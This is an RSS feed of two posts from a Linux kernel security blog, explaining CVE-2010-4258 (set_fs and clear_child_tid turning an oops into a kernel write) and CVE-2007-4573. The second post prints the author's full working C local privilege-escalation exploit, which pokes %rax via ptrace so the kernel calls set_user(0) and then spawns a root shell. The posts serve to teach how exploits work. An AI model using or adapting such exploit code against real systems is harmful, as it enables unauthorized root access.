<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Made of Bugs &#187; cve</title>
	<atom:link href="http://blog.nelhage.com/tag/cve/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.nelhage.com</link>
	<description>It's software. It's made of bugs.</description>
	<lastBuildDate>Thu, 18 Aug 2011 21:57:23 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>CVE-2010-4258: Turning denial-of-service into privilege escalation</title>
		<link>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/</link>
		<comments>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/#comments</comments>
		<pubDate>Fri, 10 Dec 2010 16:02:11 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[bugs]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[full-nelson]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=418</guid>
		<description><![CDATA[Dan Rosenberg recently released a privilege escalation bug for Linux, based on three different kernel vulnerabilities I reported recently. This post is about CVE-2010-4258, the most interesting of them, and, as Dan writes, the reason he wrote the exploit in the first place. In it, I&#8217;m going to do a brief tour of the various [...]]]></description>
			<content:encoded><![CDATA[<p>Dan Rosenberg recently <a href="http://thread.gmane.org/gmane.comp.security.full-disclosure/76457">released</a> a privilege escalation bug
for Linux, based on three different kernel vulnerabilities I reported
recently. This post is about CVE-2010-4258, the most interesting of them, and,
as Dan writes, the reason he wrote the exploit in the first place. In it, I&#8217;m
going to do a brief tour of the various kernel features that collided to make
this bug possible, and explain how they combine to turn an otherwise-boring oops
into privilege escalation.</p>

<h2><code>access_ok</code></h2>

<p>When a user application passes a pointer to the kernel, and the kernel
wants to read or write from that pointer, the kernel needs to perform
various checks that a buggy or malicious userspace app hasn&#8217;t passed
an &#8220;evil&#8221; pointer.</p>

<p>Because the kernel and userspace run in the same address space, the
most important check is simply that the pointer points into the
&#8220;userspace&#8221; part of the address space. User applications are protected
by page table permissions from writing into kernel memory, but the
kernel isn&#8217;t, and so must explicitly check that any pointers given to
it by a user don&#8217;t point into the kernel region.</p>

<p>The address space is laid out such that user applications get the
bottom portion, and the kernel gets the top, so this check is a simple
comparison against that boundary. The kernel function that performs
this check is called <code>access_ok</code>, although there are various other
functions that do the same check, implicitly or otherwise.</p>

<h2><code>get_fs()</code> and <code>set_fs()</code></h2>

<p>Occasionally, however, the kernel finds it useful to change the rules for what
<code>access_ok</code> will allow. <code>set_fs()</code><sup><a href="#fn.1" class="footnote" name="fnr.1">1</a></sup> is an internal Linux function that is used to
override the definition of the user/kernel split, for the current process.</p>

<p>After a <code>set_fs(KERNEL_DS)</code>, no checking is performed that user pointers
point to userspace &#8212; <code>access_ok</code> will always return
true. <code>set_fs(KERNEL_DS)</code> is mainly used to enable the kernel to wrap
functions that expect user pointers, by passing them pointers into the
kernel address space. A typical use reads something like this:</p>

<pre><code>old_fs = get_fs(); set_fs(KERNEL_DS);
vfs_readv(file, kernel_buffer, len, &amp;pos);
set_fs(old_fs);
</code></pre>

<p><code>vfs_readv</code> expects a user-provided pointer, so without the <code>set_fs()</code>, the
<code>access_ok()</code> inside <code>vfs_readv()</code> would fail on our kernel buffer, so we use
<code>set_fs()</code> to effectively temporarily disable that checking.</p>

<h2>Kernel oopses</h2>

<p>When the kernel oopses, perhaps because of a <code>NULL</code> pointer
dereference in kernelspace, or because of a call to the <code>BUG()</code> macro
to indicate an assertion failure, the kernel attempts to clean up, and
then tries to kill the current process by calling the <code>do_exit()</code>
function to exit the current process.</p>

<p>When the kernel does so, it&#8217;s still running in the same process
context it was before the oops occured, including any <code>set_fs()</code>
override, if applicable. Which means that <code>do_exit</code> will get called
with <code>access_ok</code> disabled &#8212; not something anyone expected when they
wrote the individual pieces of this system.</p>

<h2><code>clear_child_tid</code></h2>

<p>As it turns out, <code>do_exit</code> contains a write to a user-controlled
address that expects <code>access_ok</code> to be working properly!</p>

<p><code>clear_child_tid</code> is a feature where, on thread exit, the kernel can
be made to write a zero into a specified address in that thread&#8217;s
address space, in order to notify other threads of that exit.</p>

<p>This is implemented by simply storing a pointer to the to-be-zeroed
address inside <code>struct task_struct</code> (which represents a single thread
or process), and, on exit, <code>mm_release</code>, called from <code>do_exit</code>, does:</p>

<pre><code>put_user(0, tsk-&gt;clear_child_tid);
</code></pre>

<p>This is normally safe, because <code>put_user</code> checks that its second
argument falls into the &#8220;userspace&#8221; segment before doing a write. But,
if we are running with <code>get_fs() == KERNEL_DS</code>, it will happily accept
any address at all, even one pointing into kernel space.</p>

<p>So, if we find any kernel <code>BUG()</code> or <code>NULL</code> dereference, or other page
fault, that we can trigger after a <code>set_fs(KERNEL_DS)</code>, we can trick
the kernel into a user-controlled write into kernel memory!</p>

<h2><code>splice()</code> et. al.</h2>

<p>An obvious question at this point is: How much of the kernel can an
attacker cause to run with <code>get_fs() == KERNEL_DS</code>?</p>

<p>There are a number of small special cases. For example, the binary
sysctl compatibility code works by calling the normal <code>/proc/</code> write
handlers from kernelspace, under <code>set_fs()</code>. handful of compat-mode
(32 on 64) syscalls work similarly.</p>

<p>By far the biggest source I&#8217;ve found, however, is the <code>splice()</code>
system call. The <code>splice()</code> system call is a relatively recent
addition to Linux, and allows for zero-copy transfer of pages between
a pipe and another file descriptor.</p>

<p>As of 2.6.31, attempts to <code>splice()</code> to or from an fd that doesn&#8217;t
support special handling to actually do zero-copy <code>splice</code>, will fall
back on doing an ordinary <code>read()</code>, <code>write()</code>, or <code>sendmsg()</code> on the
fd &#8230; from the kernel, using set_fs() in order to pass in kernel
buffers.</p>

<p>What that means it that by using <code>splice()</code>, an attacker can call the
bulk of the code in most obscure filesystems and socket types (which
tend not to have explicit <code>splice()</code> support) with a segment override
in place. Conveniently for an attacker, that is also exactly a
description of where the bulk of the random security bugs tend to be.</p>

<p>This is also exactly the technique Dan&#8217;s exploit uses. He uses
CVE-2010-3849, an otherwise boring <code>NULL</code> pointer dereference I
reported in the Econet network protocol. His exploit code does a
<code>splice()</code> to an econet socket, causing the <code>econet_sendsmg</code> handler to
get called under <code>set_fs(KERNEL_DS)</code>. When it oopses, <code>do_exit</code> is
called, and he gets a user-controlled write into kernel
memory. Everything else is just details.</p>

<p><div id="footnotes">
<h2 class="footnotes">Footnotes: </h2>
<div id="text-footnotes">
<p class="footnote"><sup><a class="footnum" name="fn.1" href="#fnr.1">1</a></sup> Back in Linux 1.x, this function actually set the <tt>%fs</tt> register on i386. It hasn&#8217;t in years, but it&#8217;s used in too many places for changing the name to be worth it.</p>
</div></div></p>


]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>CVE-2007-4573: The Anatomy of a Kernel Exploit</title>
		<link>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/</link>
		<comments>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/#comments</comments>
		<pubDate>Sat, 06 Feb 2010 03:32:31 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=99</guid>
		<description><![CDATA[CVE-2007-4573 is two years old at this point, but it remains one of my favorite vulnerabilities. It was a local privilege-escalation vulnerability on all x86_64 kernels prior to v2.6.22.7. It&#8217;s very simple to understand with a little bit of background, and the exploit is super-simple, but it&#8217;s still more interesting than Yet Another NULL Pointer [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4573">CVE-2007-4573</a>
is two years old at this point, but it remains one of my favorite
vulnerabilities. It was a local privilege-escalation vulnerability on
all <code>x86_64</code> kernels prior to <code>v2.6.22.7</code>. It&#8217;s very simple to
understand with a little bit of background, and the exploit is
super-simple, but it&#8217;s still more interesting than Yet Another NULL
Pointer Dereference. Plus, it was the first kernel bug I wrote an
exploit for, which was fun.</p>

<p>In this post, I&#8217;ll write up my exploit for CVE-2007-4573, and try to
give enough background for someone with some experience with C, Linux,
and a bit of x86 assembly to understand what&#8217;s going on. If you&#8217;re an
experienced kernel hacker, you probably won&#8217;t find much new here, but
if you&#8217;re not, hopefully you&#8217;ll get a sense for some of the pieces
that go into a kernel exploit.</p>

<h2>The patch</h2>

<p>I&#8217;ll start out with the patch, or rather a slightly simplified
version, that omits some hunks that will be irrelevant for my
discussion. Then I&#8217;ll explain the context for the patch, and by that
point we&#8217;ll have enough context to understand the exploit code.</p>

<p>A simplified version of the patch follows (The original is
<a href="http://git.kernel.org/linus/176df2457ef6207156ca1a40991c54ca01fef567"><code>176df245</code></a>
in linus&#8217;s git repository) Note that this patch was applied to v2.6.22
&#8211; These files have moved around, so pull out an older kernel if
you&#8217;re trying to follow along at home:</p>

<pre><code>--- a/arch/x86_64/ia32/ia32entry.S
+++ b/arch/x86_64/ia32/ia32entry.S
@@ -38,6 +38,18 @@
        movq    %rax,R8(%rsp)
        .endm

+       .macro LOAD_ARGS32 offset
+       movl \offset(%rsp),%r11d
+       movl \offset+8(%rsp),%r10d
+       movl \offset+16(%rsp),%r9d
+       movl \offset+24(%rsp),%r8d
+       movl \offset+40(%rsp),%ecx
+       movl \offset+48(%rsp),%edx
+       movl \offset+56(%rsp),%esi
+       movl \offset+64(%rsp),%edi
+       movl \offset+72(%rsp),%eax
+       .endm
@@ -334,7 +346,7 @@ ia32_tracesys:
        movq $-ENOSYS,RAX(%rsp) /* really needed? */
        movq %rsp,%rdi        /* &amp;pt_regs -&gt; arg1 */
        call syscall_trace_enter
-       LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
+       LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        RESTORE_REST
        jmp ia32_do_syscall
 END(ia32_syscall)
</code></pre>

<p>The patch defines the <code>IA32_LOAD_ARGS</code> macro, and replaces <code>LOAD_ARGS</code>
with it in several places (I&#8217;ve only shown one for
simplicity). <code>LOAD_ARGS32</code> differs only slightly from the <code>LOAD_ARGS</code>
macro that it is replacing, which is defined in
<code>include/asm-x86_64/calling.h</code>:</p>

<pre><code>.macro LOAD_ARGS offset
movq \offset(%rsp),%r11
movq \offset+8(%rsp),%r10
movq \offset+16(%rsp),%r9
movq \offset+24(%rsp),%r8
movq \offset+40(%rsp),%rcx
movq \offset+48(%rsp),%rdx
movq \offset+56(%rsp),%rsi
movq \offset+64(%rsp),%rdi
movq \offset+72(%rsp),%rax
.endm
</code></pre>

<p>As the name suggests, <code>LOAD_ARGS32</code> loads the registers from the stack
as 32-bit values, rather than 64-bit. Importantly, in doing so it
takes advantage of a quirk in the <code>x86_64</code> architecture, that causes
the top 32 bits of the registers to be zeroed if you write to the
32-bit versions. <code>LOAD_ARGS32</code> thus zero-extends the 32-bit values it
loads into the 64-bit registers.</p>

<h2>System call handling</h2>

<p>So, why is this patch so important? Let&#8217;s look at the context for the
<code>LOAD_ARGS</code> → <code>LOAD_ARGS32</code> change. <code>ia32entry.S</code> contains the
definitions for entry-points for 32-bit compatibility-mode system
calls on an <code>x86_64</code> processor. In other words, for 32-bit processes
running on the 64-bit machine, or for 64-bit processes that use
old-style <code>int $0x80</code> system calls for whatever reason.</p>

<p>There are three entry points in the file, one for 32-bit <code>SYSCALL</code>
instructions, one for 32-bit <code>SYSENTER</code>, and one for <code>int $0x80</code>. They
are all very similar, and we will only consider the <code>int $0x80</code> case
here. At boot-time, Linux configures the processor so that <code>int $0x80</code>
will dispatch to the <code>ia32_syscall</code> entry point. Ignoring a bunch of
debugging information, tracing, and other junk, this entry point&#8217;s
code is essentially simple:</p>

<pre><code>ENTRY(ia32_syscall)
        movl %eax,%eax

        pushq %rax
        SAVE_ARGS 0,0,1

        GET_THREAD_INFO(%r10)
        orl   $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

        cmpl $(IA32_NR_syscalls-1),%eax
        ja ia32_badsys

ia32_do_call:
        IA32_ARG_FIXUP
        call *ia32_sys_call_table(,%rax,8)

        movq %rax,RAX-ARGOFFSET(%rsp)
        jmp int_ret_from_sys_call
</code></pre>

<p><code>%eax</code>, according to Linux&#8217;s syscall convention, stores the syscall number. The <code>mov</code> zero-extends it into <code>%rax</code>, and then we save it and the syscall arguments onto the stack.</p>

<p>The next block retrieves the <code>struct thread_info</code> for the current task,  sets the <code>TS_COMPAT</code> status bit to indicate that we&#8217;re handling a 32-bit compatibility mode syscall, and then
checks the thread&#8217;s flags to determine whether this thread has been flagged for extra processing on syscall entry. If so, we jump away to
code to handle that work.</p>

<p>Next (at the <code>cmpl</code>), we check to make sure that the requested syscall is in-bounds, and branch to an error path if not.</p>

<p><code>IA32_ARG_FIXUP</code> is a simple macro that moves registers around to
translate between the Linux syscall calling convention and the
<code>x86_64</code> calling convention, which each hold arguments in different
registers. Once we&#8217;ve fixed up the registers, the <code>call</code> instruction indexes the system call table by the system call number, looks up the address stored there, and calls into it to dispatch the syscall.</p>

<p>Finally, we save the return code from the system call into the register area on the stack, and jump to code to handle the return to userspace.</p>

<hr />

<p>One thing we should notice about this code is that when we
check that the syscall is in bounds, we compare against the 32-bit
<code>%eax</code> register, but when we actually dispatch the syscall, we use
the full 64 bits in <code>%rax</code>. The <code>movl</code> at the top of the function serves to zero-extend <code>%eax</code>, so that normally, the top 32 bits of <code>%rax</code> are zero, and this distinction doesn&#8217;t matter.</p>

<p>The problem arises in the &#8220;traced&#8221; path in <code>ia32_tracesys</code>, which is (again, with some
extra code removed):</p>

<pre><code>ia32_tracesys:
        movq %rsp,%rdi        /* &amp;pt_regs -&gt; arg1 */
        call syscall_trace_enter
        LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
        jmp ia32_do_call
</code></pre>

<p>Essentially, <code>ia32_tracesys</code> just calls into the C function
<code>syscall_trace_enter</code>, with a pointer to the registers saved on the stack,
and then restores the register values from the stack and jumps back to
execute the system call.</p>

<p>Herein lies the problem. If <code>syscall_trace_enter</code> replaces the on-stack <code>%rax</code> with a 64-bit value, and <code>LOAD_ARGS</code> restores it, then the <code>%eax</code>/<code>%rax</code> distinction above becomes a problem.
Aas long as <code>%eax</code> is less than <code>(IA32_NR_syscalls-1)</code>, <code>%rax</code> can be much larger than the size of the syscall table, causing the <code>call</code> to index off the end of it.</p>

<h2>ptrace(2)</h2>

<p>So what happens inside <code>syscall_trace_enter</code>, and how can we take
advantage of that to load a 64-bit value into the restored <code>%rax</code>?
Well, that turns out to be the code that handles processes traced by
the <code>ptrace(2)</code> process-tracing mechanism, which among other things,
allows the tracer to stop a child process before each system call, and
inspect and modify the child&#8217;s registers for the system call procedes.</p>

<p>Reading <code>ptrace(2)</code>, we find that we can use <code>ptrace(PTRACE_SYSCALL,…)</code>
to cause a process to execute until its next system call, and then,
once it&#8217;s stopped, we can use <code>ptrace(PTRACE_POKEUSER,…)</code> to modify
the tracee&#8217;s registers.</p>

<h2>Putting it all together</h2>

<p>So, to exploit this bug, we need to:</p>

<ul>
<li>Have a 64-bit process attach to some process with <code>ptrace</code>.</li>
<li>Use <code>PTRACE_SYSCALL</code> to stop that process at its next syscall</li>
<li>Have the process execute an <code>int $0x80</code></li>
<li>Have the parent modify <code>%rax</code> in the child to be 64 bits wide, and
allow the child to continue.</li>
</ul>

<p>At this point, the child will index waaay off the end of the syscall
table &#8212; so far off, in fact, that it will wrap around past the end of
memory (On <code>x86_64</code>, the entire kernel is mapped into the last
2 GB of address space). Since the kernel and user programs run in the same
address space, this means that, with an appropriate choice of <code>%rax</code>, the kernel will dereference an address
in the user address space to find out the address of the function it should jump to in order to handle the system call.</p>

<p>My entire exploit code follows.  This is not fully weaponized at all
&#8211; it depends on tweaking for the specific target kernel, for one, but
it works. (Well, if you can find an unpatched kernel anywhere any more
these days, it works). Nowadays, if I were writing an exploit like
this, I&#8217;d plug it into something like Brad Spengler&#8217;s
<a href="http://www.milw0rm.com/exploits/9627">Enlightenment</a>, which takes
care of most of the annoying bits of executing shell-code in-kernel to
change the current user, disable any security modules that might be
problematic, and work across kernel versions, as necessary.</p>

<pre><code>#include &lt;sys/ptrace.h&gt;
#include &lt;sys/user.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/wait.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;stddef.h&gt;

/**
 * Replace these with the values of `ia32_sys_call_table' and
 * `set_user' from /proc/kallsyms or /boot/System.map-$(uname -r)
 */
#define syscall_table 0xffffffff8044b8a0
#define set_user      0xffffffff8028d785

/*
 We don't _need_ these -- with only a little bit of cleverness, we can
 get around not knowing them, but having them will make the code
 simpler.

 set_user is defined in kernel/sys.c, and can be used to change the
 UID of the current process. We'll trick the kernel into call it on
 our behalf, and thus avoid having to write any code to run in
 kernel-mode ourselves.
*/

#define offset        (1L &lt;&lt; 32)
#define landing       (syscall_table + 8*offset)
/*
  'offset' is the 64-bit value we will load into %rax using ptrace().

  This will cause the "call" instruction we saw above to look up the
  value stored at that index off the syscall table, which is the
  address we compute in "landing".
 */


int main() {
        if((signed long)mmap((void*)(landing&amp;~0xFFF), 4096,
                              PROT_READ|PROT_EXEC|PROT_WRITE,
                              MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,
                                0, 0) &lt; 0) {
                perror("mmap");
                exit(-1);
        }
        *(long*)landing = set_user;
        /*
          We use mmap(2) to map a page at "landing", and write a
          pointer to the set_user function there.
         */

        pid_t child;
        child = fork();
        /*
          We fork two processes. The parent will ptrace the child, and
          the child will execute the `int 0x80` syscall.
         */
        if(child == 0) {
                ptrace(PTRACE_TRACEME, 0, NULL, NULL);
                kill(getpid(), SIGSTOP);
                /*
                  We ask for someone to trace us, and then signal
                  ourselves, which causes us to wait for our parent to
                  attach via `ptrace`.
                 */
                __asm__("movl $0, %ebx\n\t"
                        "int $0x80\n");
                /*
                  We then make an (arbitrary) syscall via int 0x80,
                  with %ebx set to 0. Linux's system call convention
                  stores the first argument in %ebx, so if all goes
                  right, when our parent mucks with %rax, this will
                  result in the kernel calling set_user(0), setting
                  our current UID to 0.
                */

                execl("/bin/sh", "/bin/sh", NULL);
                /* Once we have root, we exec a shell. */
        } else {
                wait(NULL);
                ptrace(PTRACE_SYSCALL, child, NULL, NULL);
                wait(NULL);
                ptrace(PTRACE_POKEUSER, child, offsetof(struct user, regs.orig_rax),
                        (void*)offset);
                ptrace(PTRACE_DETACH, child, NULL, NULL);
                wait(NULL);
                /*
                  In the parent we need to do is `wait` for the child
                  to stop, allow it to advance until the next syscall,
                  use `PTRACE_POKEUSER` to poke `offset` into `%rax`,
                  and then detach and let it run.
                 */
        }
}
</code></pre>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

